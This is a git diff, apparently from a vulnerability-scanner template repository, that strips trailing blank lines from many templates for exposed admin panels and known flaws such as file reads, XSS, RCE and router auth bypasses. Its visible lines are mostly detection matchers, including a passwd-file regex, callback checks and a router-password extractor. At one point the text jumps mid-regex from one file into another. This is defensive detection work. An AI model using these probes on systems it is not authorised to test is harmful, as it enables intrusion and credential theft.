index 4b188646f3..6db05cf9f5 100644 --- a/http/exposed-panels/directadmin-login-panel.yaml +++ b/http/exposed-panels/directadmin-login-panel.yaml @@ -30,5 +30,3 @@ http: - type: status status: - 200 - - diff --git a/http/exposed-panels/directum-login.yaml b/http/exposed-panels/directum-login.yaml index 89e43700cc..27d902e16d 100644 --- a/http/exposed-panels/directum-login.yaml +++ b/http/exposed-panels/directum-login.yaml @@ -31,5 +31,3 @@ http: - type: status status: - 200 - - diff --git a/http/exposed-panels/django-admin-panel.yaml b/http/exposed-panels/django-admin-panel.yaml index b2eb07099f..ae764b7e12 100644 --- a/http/exposed-panels/django-admin-panel.yaml +++ b/http/exposed-panels/django-admin-panel.yaml @@ -23,5 +23,3 @@ http: - "Django administration" condition: and part: body - - diff --git a/http/exposed-panels/docebo-elearning-panel.yaml b/http/exposed-panels/docebo-elearning-panel.yaml index 438bb4e2f3..84b49fb7f6 100644 --- a/http/exposed-panels/docebo-elearning-panel.yaml +++ b/http/exposed-panels/docebo-elearning-panel.yaml @@ -30,5 +30,3 @@ http: - type: status status: - 200 - - diff --git a/http/exposed-panels/dolibarr-panel.yaml b/http/exposed-panels/dolibarr-panel.yaml index bd2128bfe4..f4cc56315b 100644 --- a/http/exposed-panels/dolibarr-panel.yaml +++ b/http/exposed-panels/dolibarr-panel.yaml @@ -43,5 +43,3 @@ http: - 'Dolibarr ([0-9.]+)<\/td>' - 'Dolibarr ([0-9.]+)<\/td>' - '

    Dolibarr ([0-9.]+)<\/div>' - - diff --git a/http/exposed-panels/dotclear-panel.yaml b/http/exposed-panels/dotclear-panel.yaml index 75b9d9333c..6dac9cf591 100644 --- a/http/exposed-panels/dotclear-panel.yaml +++ b/http/exposed-panels/dotclear-panel.yaml @@ -31,5 +31,3 @@ http: - type: status status: - 200 - - diff --git a/http/exposed-panels/dotcms-admin-panel.yaml b/http/exposed-panels/dotcms-admin-panel.yaml index 00882e977b..7867d069f1 100644 --- a/http/exposed-panels/dotcms-admin-panel.yaml +++ b/http/exposed-panels/dotcms-admin-panel.yaml @@ -23,5 +23,3 @@ http: - type: word words: - 'dotCMS Content Management Platform' - - diff --git a/http/exposed-panels/dplus-dashboard.yaml b/http/exposed-panels/dplus-dashboard.yaml index 48ad0a520d..1a788c5f9a 100644 --- a/http/exposed-panels/dplus-dashboard.yaml +++ b/http/exposed-panels/dplus-dashboard.yaml @@ -33,5 +33,3 @@ http: - type: status status: - 200 - - diff --git a/http/exposed-panels/dqs-superadmin-panel.yaml b/http/exposed-panels/dqs-superadmin-panel.yaml index 2ca57eda9a..4a7ca442ff 100644 --- a/http/exposed-panels/dqs-superadmin-panel.yaml +++ b/http/exposed-panels/dqs-superadmin-panel.yaml @@ -29,5 +29,3 @@ http: - type: status status: - 200 - - diff --git a/http/exposed-panels/dradis-pro-panel.yaml b/http/exposed-panels/dradis-pro-panel.yaml index e6e3960166..f35ec3f756 100644 --- a/http/exposed-panels/dradis-pro-panel.yaml +++ b/http/exposed-panels/dradis-pro-panel.yaml @@ -32,5 +32,3 @@ http: - type: status status: - 200 - - diff --git a/http/exposed-panels/drawio-flowchartmaker-panel.yaml b/http/exposed-panels/drawio-flowchartmaker-panel.yaml index 4345c7f526..dd222be274 100644 --- a/http/exposed-panels/drawio-flowchartmaker-panel.yaml +++ b/http/exposed-panels/drawio-flowchartmaker-panel.yaml @@ -33,5 +33,3 @@ http: - type: status status: - 200 - - diff --git a/http/exposed-panels/drone-ci-panel.yaml b/http/exposed-panels/drone-ci-panel.yaml index c24cfc3a5d..f29cdb7a67 100644 --- a/http/exposed-panels/drone-ci-panel.yaml +++ b/http/exposed-panels/drone-ci-panel.yaml @@ -32,5 +32,3 @@ http: - type: status status: - 200 - - diff --git a/http/exposed-panels/druid-console-exposure.yaml b/http/exposed-panels/druid-console-exposure.yaml index 02939d22d2..e4bb08ce77 100644 --- a/http/exposed-panels/druid-console-exposure.yaml +++ b/http/exposed-panels/druid-console-exposure.yaml @@ -24,5 +24,3 @@ http: - 'src="/druid.js"' - 'href="/druid.css"' condition: and - - diff --git a/http/exposed-panels/druid-panel.yaml b/http/exposed-panels/druid-panel.yaml index c467780d95..1949f146d6 100644 --- a/http/exposed-panels/druid-panel.yaml +++ b/http/exposed-panels/druid-panel.yaml @@ -28,5 +28,3 @@ http: - type: status status: - 200 - - diff --git a/http/exposed-panels/drupal-login.yaml b/http/exposed-panels/drupal-login.yaml index b531e7dd05..71785d2b65 100644 --- a/http/exposed-panels/drupal-login.yaml +++ b/http/exposed-panels/drupal-login.yaml @@ -36,5 +36,3 @@ http: - '(?i)x-drupal' - "(?i)x-generator: drupal" condition: or - - diff --git a/http/exposed-panels/dynamicweb-panel.yaml b/http/exposed-panels/dynamicweb-panel.yaml index 4c5254d34c..1cf5d98969 100644 --- a/http/exposed-panels/dynamicweb-panel.yaml +++ b/http/exposed-panels/dynamicweb-panel.yaml @@ -40,5 +40,3 @@ http: group: 1 regex: - version ([0-9.]+) - - diff --git a/http/exposed-panels/dynatrace-panel.yaml b/http/exposed-panels/dynatrace-panel.yaml index f63c3be79b..31cf72f851 100644 --- a/http/exposed-panels/dynatrace-panel.yaml +++ b/http/exposed-panels/dynatrace-panel.yaml @@ -31,5 +31,3 @@ http: - type: status status: - 200 - - diff --git a/http/exposed-panels/dzzoffice/dzzoffice-install.yaml b/http/exposed-panels/dzzoffice/dzzoffice-install.yaml index ec683789d5..b3fa2a8071 100644 --- a/http/exposed-panels/dzzoffice/dzzoffice-install.yaml +++ b/http/exposed-panels/dzzoffice/dzzoffice-install.yaml @@ -38,5 +38,3 @@ http: - type: status status: - 200 - - diff --git a/http/exposed-panels/dzzoffice/dzzoffice-panel.yaml b/http/exposed-panels/dzzoffice/dzzoffice-panel.yaml index 59e784e1e0..376a231d0f 100644 --- a/http/exposed-panels/dzzoffice/dzzoffice-panel.yaml +++ b/http/exposed-panels/dzzoffice/dzzoffice-panel.yaml @@ -38,5 +38,3 @@ http: - type: status status: - 200 - - diff --git a/http/exposed-panels/e-mobile-panel.yaml b/http/exposed-panels/e-mobile-panel.yaml index 52951ac516..60e1244529 100644 --- a/http/exposed-panels/e-mobile-panel.yaml +++ b/http/exposed-panels/e-mobile-panel.yaml @@ -42,5 +42,3 @@ http: group: 1 regex: - 'E-Mobile ([0-9.]+)' - - diff --git a/http/exposed-panels/eMerge-panel.yaml b/http/exposed-panels/eMerge-panel.yaml index e4153adc99..a84a0831b2 100644 --- a/http/exposed-panels/eMerge-panel.yaml +++ b/http/exposed-panels/eMerge-panel.yaml @@ -32,5 +32,3 @@ http: - type: status status: - 200 - - diff --git a/http/exposed-panels/ecosys-command-center.yaml b/http/exposed-panels/ecosys-command-center.yaml index 54a1bcd5ac..aacb3ce666 100644 --- a/http/exposed-panels/ecosys-command-center.yaml +++ b/http/exposed-panels/ecosys-command-center.yaml @@ -28,5 +28,3 @@ http: - type: status status: - 200 - - diff --git a/http/exposed-panels/edgeos-login.yaml b/http/exposed-panels/edgeos-login.yaml index c701fb72c0..ab433b1dbb 100644 --- a/http/exposed-panels/edgeos-login.yaml +++ b/http/exposed-panels/edgeos-login.yaml @@ -28,5 +28,3 @@ http: - type: status status: - 200 - - diff --git a/http/exposed-panels/eko-management-console-login.yaml b/http/exposed-panels/eko-management-console-login.yaml index e3909fec3c..dea9bd83df 100644 --- a/http/exposed-panels/eko-management-console-login.yaml +++ b/http/exposed-panels/eko-management-console-login.yaml @@ -33,5 +33,3 @@ http: - type: status status: - 200 - - diff --git a/http/exposed-panels/eko-software-update-panel.yaml b/http/exposed-panels/eko-software-update-panel.yaml index 78b62cf91e..ce9a84d5a5 100644 --- a/http/exposed-panels/eko-software-update-panel.yaml +++ b/http/exposed-panels/eko-software-update-panel.yaml @@ -32,5 +32,3 @@ http: - type: status status: - 200 - - diff --git a/http/exposed-panels/elemiz-network-manager.yaml b/http/exposed-panels/elemiz-network-manager.yaml index f7bc6efb8a..8f3beed7a7 100644 --- a/http/exposed-panels/elemiz-network-manager.yaml +++ b/http/exposed-panels/elemiz-network-manager.yaml @@ -30,5 +30,3 @@ http: - type: status status: - 200 - - diff --git a/http/exposed-panels/emby-panel.yaml b/http/exposed-panels/emby-panel.yaml index 6b1e2c06aa..b4a47a62ab 100644 --- a/http/exposed-panels/emby-panel.yaml +++ b/http/exposed-panels/emby-panel.yaml @@ -43,5 +43,3 @@ http: group: 1 regex: - '\" keyword') condition: and - - diff --git a/http/vulnerabilities/other/hospital-management-xss2.yaml b/http/vulnerabilities/other/hospital-management-xss2.yaml index f491628c62..45e1f53db6 100644 --- a/http/vulnerabilities/other/hospital-management-xss2.yaml +++ b/http/vulnerabilities/other/hospital-management-xss2.yaml @@ -44,5 +44,3 @@ http: - "status_code_2 == 200" - contains(body_2, 'Result against \"\" keyword') condition: and - - diff --git a/http/vulnerabilities/other/hrsale-unauthenticated-lfi.yaml b/http/vulnerabilities/other/hrsale-unauthenticated-lfi.yaml index 7b1951377c..c340012c49 100644 --- a/http/vulnerabilities/other/hrsale-unauthenticated-lfi.yaml +++ b/http/vulnerabilities/other/hrsale-unauthenticated-lfi.yaml @@ -30,5 +30,3 @@ http: - type: status status: - 200 - - diff --git a/http/vulnerabilities/other/huawei-hg659-lfi.yaml b/http/vulnerabilities/other/huawei-hg659-lfi.yaml index 3351a064b1..491133d73a 100644 --- a/http/vulnerabilities/other/huawei-hg659-lfi.yaml +++ b/http/vulnerabilities/other/huawei-hg659-lfi.yaml @@ -31,5 +31,3 @@ http: - type: status status: - 200 - - diff --git a/http/vulnerabilities/other/huawei-router-auth-bypass.yaml b/http/vulnerabilities/other/huawei-router-auth-bypass.yaml index 2a4665f349..afb9d0a882 100644 --- a/http/vulnerabilities/other/huawei-router-auth-bypass.yaml +++ b/http/vulnerabilities/other/huawei-router-auth-bypass.yaml @@ -35,5 +35,3 @@ http: - "SerialNumber" - "HardwareVersion" condition: and - - diff --git a/http/vulnerabilities/other/huijietong-cloud-fileread.yaml b/http/vulnerabilities/other/huijietong-cloud-fileread.yaml index b7b54e74dc..0623b1ac59 100644 --- a/http/vulnerabilities/other/huijietong-cloud-fileread.yaml +++ b/http/vulnerabilities/other/huijietong-cloud-fileread.yaml @@ -33,5 +33,3 @@ http: - type: status status: - 200 - - diff --git a/http/vulnerabilities/other/icewarp-open-redirect.yaml b/http/vulnerabilities/other/icewarp-open-redirect.yaml index 3333feb88b..3506184ccd 100644 --- a/http/vulnerabilities/other/icewarp-open-redirect.yaml +++ b/http/vulnerabilities/other/icewarp-open-redirect.yaml @@ -40,5 +40,3 @@ http: group: 1 regex: - 'Server: (.{4,20})' - - diff --git a/http/vulnerabilities/other/icewarp-webclient-rce.yaml b/http/vulnerabilities/other/icewarp-webclient-rce.yaml index 570b76faeb..13f7dd61b5 100644 --- a/http/vulnerabilities/other/icewarp-webclient-rce.yaml +++ b/http/vulnerabilities/other/icewarp-webclient-rce.yaml @@ -34,5 +34,3 @@ http: - type: status status: - 302 - - diff --git a/http/vulnerabilities/other/inspur-clusterengine-rce.yaml b/http/vulnerabilities/other/inspur-clusterengine-rce.yaml index b91d5a387b..69cf2914f2 100644 --- a/http/vulnerabilities/other/inspur-clusterengine-rce.yaml +++ b/http/vulnerabilities/other/inspur-clusterengine-rce.yaml @@ -42,5 +42,3 @@ http: - type: status status: - 200 - - diff --git a/http/vulnerabilities/other/interlib-fileread.yaml b/http/vulnerabilities/other/interlib-fileread.yaml index 8aeeb14225..e15e90557e 100644 --- a/http/vulnerabilities/other/interlib-fileread.yaml +++ b/http/vulnerabilities/other/interlib-fileread.yaml @@ -33,5 +33,3 @@ http: - type: status status: - 200 - - diff --git a/http/vulnerabilities/other/java-melody-xss.yaml b/http/vulnerabilities/other/java-melody-xss.yaml index 342313efbe..4ff2494321 100644 --- a/http/vulnerabilities/other/java-melody-xss.yaml +++ b/http/vulnerabilities/other/java-melody-xss.yaml @@ -35,5 +35,3 @@ http: - type: status status: - 200 - - diff --git a/http/vulnerabilities/other/jeewms-lfi.yaml b/http/vulnerabilities/other/jeewms-lfi.yaml index 86c40a6c75..4396a29cd7 100644 --- a/http/vulnerabilities/other/jeewms-lfi.yaml +++ b/http/vulnerabilities/other/jeewms-lfi.yaml @@ -40,5 +40,3 @@ http: - type: status status: - 200 - - diff --git a/http/vulnerabilities/other/jinfornet-jreport-lfi.yaml b/http/vulnerabilities/other/jinfornet-jreport-lfi.yaml index ae53aebbea..852284e62f 100644 --- a/http/vulnerabilities/other/jinfornet-jreport-lfi.yaml +++ b/http/vulnerabilities/other/jinfornet-jreport-lfi.yaml @@ -31,5 +31,3 @@ http: - type: status status: - 200 - - diff --git a/http/vulnerabilities/other/joomla-com-fabrik-lfi.yaml b/http/vulnerabilities/other/joomla-com-fabrik-lfi.yaml index b8fd0f3d10..eb440a10f8 100644 --- a/http/vulnerabilities/other/joomla-com-fabrik-lfi.yaml +++ b/http/vulnerabilities/other/joomla-com-fabrik-lfi.yaml @@ -33,5 +33,3 @@ http: - type: status status: - 200 - - diff --git a/http/vulnerabilities/other/kafdrop-xss.yaml b/http/vulnerabilities/other/kafdrop-xss.yaml index 929921c0b8..1a0b69abad 100644 --- a/http/vulnerabilities/other/kafdrop-xss.yaml +++ b/http/vulnerabilities/other/kafdrop-xss.yaml @@ -33,5 +33,3 @@ http: - type: status status: - 500 - - diff --git a/http/vulnerabilities/other/karel-ip-phone-lfi.yaml b/http/vulnerabilities/other/karel-ip-phone-lfi.yaml index 3aceaad6c6..5cb6b8b710 100644 --- a/http/vulnerabilities/other/karel-ip-phone-lfi.yaml +++ b/http/vulnerabilities/other/karel-ip-phone-lfi.yaml @@ -32,5 +32,3 @@ http: - type: status status: - 200 - - diff --git a/http/vulnerabilities/other/kavita-lfi.yaml b/http/vulnerabilities/other/kavita-lfi.yaml index 77032933aa..355de0c3ac 100644 --- a/http/vulnerabilities/other/kavita-lfi.yaml +++ b/http/vulnerabilities/other/kavita-lfi.yaml @@ -36,5 +36,3 @@ http: - type: status status: - 200 - - diff --git a/http/vulnerabilities/other/kevinlab-bems-backdoor.yaml b/http/vulnerabilities/other/kevinlab-bems-backdoor.yaml index 09f15f88d8..75cb444fff 100644 --- a/http/vulnerabilities/other/kevinlab-bems-backdoor.yaml +++ b/http/vulnerabilities/other/kevinlab-bems-backdoor.yaml @@ -38,5 +38,3 @@ http: - type: status status: - 200 - - diff --git a/http/vulnerabilities/other/kevinlab-bems-sqli.yaml b/http/vulnerabilities/other/kevinlab-bems-sqli.yaml index 68b651d006..d12f9cf07e 100644 --- a/http/vulnerabilities/other/kevinlab-bems-sqli.yaml +++ b/http/vulnerabilities/other/kevinlab-bems-sqli.yaml @@ -37,5 +37,3 @@ http: - type: status status: - 200 - - diff --git a/http/vulnerabilities/other/kevinlab-hems-backdoor.yaml b/http/vulnerabilities/other/kevinlab-hems-backdoor.yaml index 82cd5ae67c..6c340e7005 100644 --- a/http/vulnerabilities/other/kevinlab-hems-backdoor.yaml +++ b/http/vulnerabilities/other/kevinlab-hems-backdoor.yaml @@ -44,5 +44,3 @@ http: - type: status status: - 200 - - diff --git a/http/vulnerabilities/other/keycloak-xss.yaml b/http/vulnerabilities/other/keycloak-xss.yaml index b8c8935a24..be32070449 100644 --- a/http/vulnerabilities/other/keycloak-xss.yaml +++ b/http/vulnerabilities/other/keycloak-xss.yaml @@ -33,5 +33,3 @@ http: - type: word words: - 'Unrecognized field ""' - - diff --git a/http/vulnerabilities/other/kingdee-eas-directory-traversal.yaml b/http/vulnerabilities/other/kingdee-eas-directory-traversal.yaml index 8ff6319cc6..b3a442c1b3 100644 --- a/http/vulnerabilities/other/kingdee-eas-directory-traversal.yaml +++ b/http/vulnerabilities/other/kingdee-eas-directory-traversal.yaml @@ -39,5 +39,3 @@ http: - type: status status: - 200 - - diff --git a/http/vulnerabilities/other/kingsoft-v8-file-read.yaml b/http/vulnerabilities/other/kingsoft-v8-file-read.yaml index a556dc3472..973dd91ed8 100644 --- a/http/vulnerabilities/other/kingsoft-v8-file-read.yaml +++ b/http/vulnerabilities/other/kingsoft-v8-file-read.yaml @@ -37,5 +37,3 @@ http: - type: status status: - 200 - - diff --git a/http/vulnerabilities/other/kyocera-m2035dn-lfi.yaml b/http/vulnerabilities/other/kyocera-m2035dn-lfi.yaml index 918e16f46d..4f861433a1 100644 --- a/http/vulnerabilities/other/kyocera-m2035dn-lfi.yaml +++ b/http/vulnerabilities/other/kyocera-m2035dn-lfi.yaml @@ -30,5 +30,3 @@ http: - type: status status: - 200 - - diff --git a/http/vulnerabilities/other/laravel-filemanager-lfi.yaml b/http/vulnerabilities/other/laravel-filemanager-lfi.yaml index 55fe98d100..aa1177b16b 100644 --- a/http/vulnerabilities/other/laravel-filemanager-lfi.yaml +++ b/http/vulnerabilities/other/laravel-filemanager-lfi.yaml @@ -29,5 +29,3 @@ http: - type: status status: - 200 - - diff --git a/http/vulnerabilities/other/loancms-sqli.yaml b/http/vulnerabilities/other/loancms-sqli.yaml index ced56f1489..3f8a308c7d 100644 --- a/http/vulnerabilities/other/loancms-sqli.yaml +++ b/http/vulnerabilities/other/loancms-sqli.yaml @@ -47,5 +47,3 @@ http: words: - 'login-form' negative: true - - diff --git a/http/vulnerabilities/other/lotuscms-rce.yaml b/http/vulnerabilities/other/lotuscms-rce.yaml index d469d18a4f..c8ca99b072 100644 --- a/http/vulnerabilities/other/lotuscms-rce.yaml +++ b/http/vulnerabilities/other/lotuscms-rce.yaml @@ -37,5 +37,3 @@ http: - type: status status: - 200 - - diff --git a/http/vulnerabilities/other/lucee-xss.yaml b/http/vulnerabilities/other/lucee-xss.yaml index 1dd4708070..470550b807 100644 --- a/http/vulnerabilities/other/lucee-xss.yaml +++ b/http/vulnerabilities/other/lucee-xss.yaml @@ -31,5 +31,3 @@ http: - "lucee-err" part: body condition: and - - diff --git a/http/vulnerabilities/other/maccmsv10-backdoor.yaml b/http/vulnerabilities/other/maccmsv10-backdoor.yaml index c2fe1dd6eb..660e15d8e3 100644 --- a/http/vulnerabilities/other/maccmsv10-backdoor.yaml +++ b/http/vulnerabilities/other/maccmsv10-backdoor.yaml @@ -36,5 +36,3 @@ http: - type: status status: - 200 - - diff --git a/http/vulnerabilities/other/magicflow-lfi.yaml b/http/vulnerabilities/other/magicflow-lfi.yaml index 20e85061a0..04c7cdd838 100644 --- a/http/vulnerabilities/other/magicflow-lfi.yaml +++ b/http/vulnerabilities/other/magicflow-lfi.yaml @@ -33,5 +33,3 @@ http: - type: status status: - 200 - - diff --git a/http/vulnerabilities/other/mcafee-epo-rce.yaml b/http/vulnerabilities/other/mcafee-epo-rce.yaml index 846d24eada..47bb71eb30 100644 --- a/http/vulnerabilities/other/mcafee-epo-rce.yaml +++ b/http/vulnerabilities/other/mcafee-epo-rce.yaml @@ -29,5 +29,3 @@ http: regex: - "Volume (in drive [A-Z]|Serial Number) is" part: body - - diff --git a/http/vulnerabilities/other/metinfo-lfi.yaml b/http/vulnerabilities/other/metinfo-lfi.yaml index 7dc463fa48..e8a741ea7f 100644 --- a/http/vulnerabilities/other/metinfo-lfi.yaml +++ b/http/vulnerabilities/other/metinfo-lfi.yaml @@ -36,5 +36,3 @@ http: - type: status status: - 200 - - diff --git a/http/vulnerabilities/other/microweber-xss.yaml b/http/vulnerabilities/other/microweber-xss.yaml index 6254e9983c..cdb82eb606 100644 --- a/http/vulnerabilities/other/microweber-xss.yaml +++ b/http/vulnerabilities/other/microweber-xss.yaml @@ -37,5 +37,3 @@ http: - type: status status: - 200 - - diff --git a/http/vulnerabilities/other/mida-eframework-xss.yaml b/http/vulnerabilities/other/mida-eframework-xss.yaml index 5683120283..4d71231756 100644 --- a/http/vulnerabilities/other/mida-eframework-xss.yaml +++ b/http/vulnerabilities/other/mida-eframework-xss.yaml @@ -34,5 +34,3 @@ http: - type: word words: - '">' - - diff --git a/http/vulnerabilities/other/minimouse-lfi.yaml b/http/vulnerabilities/other/minimouse-lfi.yaml index fa9ebf208a..daddf698e4 100644 --- a/http/vulnerabilities/other/minimouse-lfi.yaml +++ b/http/vulnerabilities/other/minimouse-lfi.yaml @@ -33,5 +33,3 @@ http: - "extensions" condition: and part: body - - diff --git a/http/vulnerabilities/other/mirai-unknown-rce.yaml b/http/vulnerabilities/other/mirai-unknown-rce.yaml index c17949c7f7..3195631a1b 100644 --- a/http/vulnerabilities/other/mirai-unknown-rce.yaml +++ b/http/vulnerabilities/other/mirai-unknown-rce.yaml @@ -30,5 +30,3 @@ http: part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" - - diff --git a/http/vulnerabilities/other/mpsec-lfi.yaml b/http/vulnerabilities/other/mpsec-lfi.yaml index dca93e1923..0e6d14593f 100644 --- a/http/vulnerabilities/other/mpsec-lfi.yaml +++ b/http/vulnerabilities/other/mpsec-lfi.yaml @@ -38,5 +38,3 @@ http: words: - "text/plain" part: header - - diff --git a/http/vulnerabilities/other/myucms-lfr.yaml b/http/vulnerabilities/other/myucms-lfr.yaml index 2931ffce47..5a642c0ac2 100644 --- a/http/vulnerabilities/other/myucms-lfr.yaml +++ b/http/vulnerabilities/other/myucms-lfr.yaml @@ -23,5 +23,3 @@ http: - type: regex regex: - "root:.*:0:0:" - - diff --git a/http/vulnerabilities/other/natshell-path-traversal.yaml b/http/vulnerabilities/other/natshell-path-traversal.yaml index 857db596d5..ae2cd11c26 100644 --- a/http/vulnerabilities/other/natshell-path-traversal.yaml +++ b/http/vulnerabilities/other/natshell-path-traversal.yaml @@ -31,5 +31,3 @@ http: - type: status status: - 200 - - diff --git a/http/vulnerabilities/other/natshell-rce.yaml b/http/vulnerabilities/other/natshell-rce.yaml index 61181d03ed..ca445fbf6b 100644 --- a/http/vulnerabilities/other/natshell-rce.yaml +++ b/http/vulnerabilities/other/natshell-rce.yaml @@ -34,5 +34,3 @@ http: - type: status status: - 200 - - diff --git a/http/vulnerabilities/other/netgear-router-auth-bypass.yaml b/http/vulnerabilities/other/netgear-router-auth-bypass.yaml index 200ecf793a..0e32555525 100644 --- a/http/vulnerabilities/other/netgear-router-auth-bypass.yaml +++ b/http/vulnerabilities/other/netgear-router-auth-bypass.yaml @@ -37,5 +37,3 @@ http: - type: word words: - "WAN Setup" - - diff --git a/http/vulnerabilities/other/netgear-router-exposure.yaml b/http/vulnerabilities/other/netgear-router-exposure.yaml index f94faf8149..f9de3017ae 100644 --- a/http/vulnerabilities/other/netgear-router-exposure.yaml +++ b/http/vulnerabilities/other/netgear-router-exposure.yaml @@ -46,5 +46,3 @@ http: group: 1 regex: - "([A-Z0-9]+)<\\/serialNumber>" - - diff --git a/http/vulnerabilities/other/netgear-wac124-router-auth-bypass.yaml b/http/vulnerabilities/other/netgear-wac124-router-auth-bypass.yaml index cb3a7d6d3f..e0c784df84 100644 --- a/http/vulnerabilities/other/netgear-wac124-router-auth-bypass.yaml +++ b/http/vulnerabilities/other/netgear-wac124-router-auth-bypass.yaml @@ -31,5 +31,3 @@ http: - type: word words: - "Enable Telnet" - - diff --git a/http/vulnerabilities/other/netis-info-leak.yaml b/http/vulnerabilities/other/netis-info-leak.yaml index c3a3814486..8537c34f7b 100644 --- a/http/vulnerabilities/other/netis-info-leak.yaml +++ b/http/vulnerabilities/other/netis-info-leak.yaml @@ -41,5 +41,3 @@ http: part: body regex: - "'rp_soon_password':'([A-Za-z0-9]+)'" - - diff --git a/http/vulnerabilities/other/nextjs-redirect.yaml b/http/vulnerabilities/other/nextjs-redirect.yaml index 257e2826ff..a5ba9def00 100644 --- a/http/vulnerabilities/other/nextjs-redirect.yaml +++ b/http/vulnerabilities/other/nextjs-redirect.yaml @@ -33,5 +33,3 @@ http: - type: status status: - 308 - - diff --git a/http/vulnerabilities/other/nginx-merge-slashes-path-traversal.yaml b/http/vulnerabilities/other/nginx-merge-slashes-path-traversal.yaml index 2fd03d632d..c0270b827a 100644 --- a/http/vulnerabilities/other/nginx-merge-slashes-path-traversal.yaml +++ b/http/vulnerabilities/other/nginx-merge-slashes-path-traversal.yaml @@ -37,5 +37,3 @@ http: - type: status status: - 200 - - diff --git a/http/vulnerabilities/other/nginx-module-vts-xss.yaml b/http/vulnerabilities/other/nginx-module-vts-xss.yaml index 61a0d6cf18..63d2e70dfc 100644 --- a/http/vulnerabilities/other/nginx-module-vts-xss.yaml +++ b/http/vulnerabilities/other/nginx-module-vts-xss.yaml @@ -35,5 +35,3 @@ http: words: - "text/html" part: header - - diff --git a/http/vulnerabilities/other/ns-asg-file-read.yaml b/http/vulnerabilities/other/ns-asg-file-read.yaml index 7d3c7ca50e..af9d964378 100644 --- a/http/vulnerabilities/other/ns-asg-file-read.yaml +++ b/http/vulnerabilities/other/ns-asg-file-read.yaml @@ -37,5 +37,3 @@ http: - "$certfile" - "application/pdf" condition: and - - diff --git a/http/vulnerabilities/other/nuuo-file-inclusion.yaml b/http/vulnerabilities/other/nuuo-file-inclusion.yaml index de48bae5e4..e8a6ff15dc 100644 --- a/http/vulnerabilities/other/nuuo-file-inclusion.yaml +++ b/http/vulnerabilities/other/nuuo-file-inclusion.yaml @@ -35,5 +35,3 @@ http: - type: status status: - 200 - - diff --git a/http/vulnerabilities/other/nuuo-nvrmini2-rce.yaml b/http/vulnerabilities/other/nuuo-nvrmini2-rce.yaml index d439b9640e..41bfb0e3b7 100644 --- a/http/vulnerabilities/other/nuuo-nvrmini2-rce.yaml +++ b/http/vulnerabilities/other/nuuo-nvrmini2-rce.yaml @@ -33,5 +33,3 @@ http: - type: status status: - 200 - - diff --git a/http/vulnerabilities/other/odoo-cms-redirect.yaml b/http/vulnerabilities/other/odoo-cms-redirect.yaml index 8353771b1d..99c16e6e14 100644 --- a/http/vulnerabilities/other/odoo-cms-redirect.yaml +++ b/http/vulnerabilities/other/odoo-cms-redirect.yaml @@ -26,5 +26,3 @@ http: regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' part: header - - diff --git a/http/vulnerabilities/other/oliver-library-lfi.yaml b/http/vulnerabilities/other/oliver-library-lfi.yaml index 2bbb7c4b84..cb34bb929b 100644 --- a/http/vulnerabilities/other/oliver-library-lfi.yaml +++ b/http/vulnerabilities/other/oliver-library-lfi.yaml @@ -29,5 +29,3 @@ http: - "fonts" - "extensions" condition: and - - diff --git a/http/vulnerabilities/other/onlinefarm-management-xss.yaml b/http/vulnerabilities/other/onlinefarm-management-xss.yaml index 7b1d97b597..e27ba09bb5 100644 --- a/http/vulnerabilities/other/onlinefarm-management-xss.yaml +++ b/http/vulnerabilities/other/onlinefarm-management-xss.yaml @@ -43,5 +43,3 @@ http: - type: status status: - 200 - - diff --git a/http/vulnerabilities/other/opencti-lfi.yaml b/http/vulnerabilities/other/opencti-lfi.yaml index 56d9291105..1613c98017 100644 --- a/http/vulnerabilities/other/opencti-lfi.yaml +++ b/http/vulnerabilities/other/opencti-lfi.yaml @@ -33,5 +33,3 @@ http: - type: status status: - 200 - - diff --git a/http/vulnerabilities/other/opennms-log4j-jndi-rce.yaml b/http/vulnerabilities/other/opennms-log4j-jndi-rce.yaml index 6d96e04bbb..cb922285e0 100644 --- a/http/vulnerabilities/other/opennms-log4j-jndi-rce.yaml +++ b/http/vulnerabilities/other/opennms-log4j-jndi-rce.yaml @@ -63,5 +63,3 @@ http: group: 1 regex: - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output - - diff --git a/http/vulnerabilities/other/opensis-lfi.yaml b/http/vulnerabilities/other/opensis-lfi.yaml index 7ad4961252..9db1a8cd2f 100644 --- a/http/vulnerabilities/other/opensis-lfi.yaml +++ b/http/vulnerabilities/other/opensis-lfi.yaml @@ -32,5 +32,3 @@ http: - type: status status: - 200 - - diff --git a/http/vulnerabilities/other/opensns-rce.yaml b/http/vulnerabilities/other/opensns-rce.yaml index b7005911a2..f1b0c35726 100644 --- a/http/vulnerabilities/other/opensns-rce.yaml +++ b/http/vulnerabilities/other/opensns-rce.yaml @@ -36,5 +36,3 @@ http: - type: status status: - 200 - - diff --git a/http/vulnerabilities/other/optilink-ont1gew-gpon-rce.yaml b/http/vulnerabilities/other/optilink-ont1gew-gpon-rce.yaml index dd2ef2a58d..4d4b009644 100644 --- a/http/vulnerabilities/other/optilink-ont1gew-gpon-rce.yaml +++ b/http/vulnerabilities/other/optilink-ont1gew-gpon-rce.yaml @@ -35,5 +35,3 @@ http: part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" - - diff --git a/http/vulnerabilities/other/oracle-fatwire-lfi.yaml b/http/vulnerabilities/other/oracle-fatwire-lfi.yaml index dcca8ff7d9..281445e6cd 100644 --- a/http/vulnerabilities/other/oracle-fatwire-lfi.yaml +++ b/http/vulnerabilities/other/oracle-fatwire-lfi.yaml @@ -31,5 +31,3 @@ http: - type: status status: - 200 - - diff --git a/http/vulnerabilities/other/orbiteam-bscw-server-lfi.yaml b/http/vulnerabilities/other/orbiteam-bscw-server-lfi.yaml index ca46397a28..543b431220 100644 --- a/http/vulnerabilities/other/orbiteam-bscw-server-lfi.yaml +++ b/http/vulnerabilities/other/orbiteam-bscw-server-lfi.yaml @@ -31,5 +31,3 @@ http: - type: status status: - 200 - - diff --git a/http/vulnerabilities/other/otobo-open-redirect.yaml b/http/vulnerabilities/other/otobo-open-redirect.yaml index 8652d1a12e..9c9f3c7976 100644 --- a/http/vulnerabilities/other/otobo-open-redirect.yaml +++ b/http/vulnerabilities/other/otobo-open-redirect.yaml @@ -26,5 +26,3 @@ http: part: header regex: - 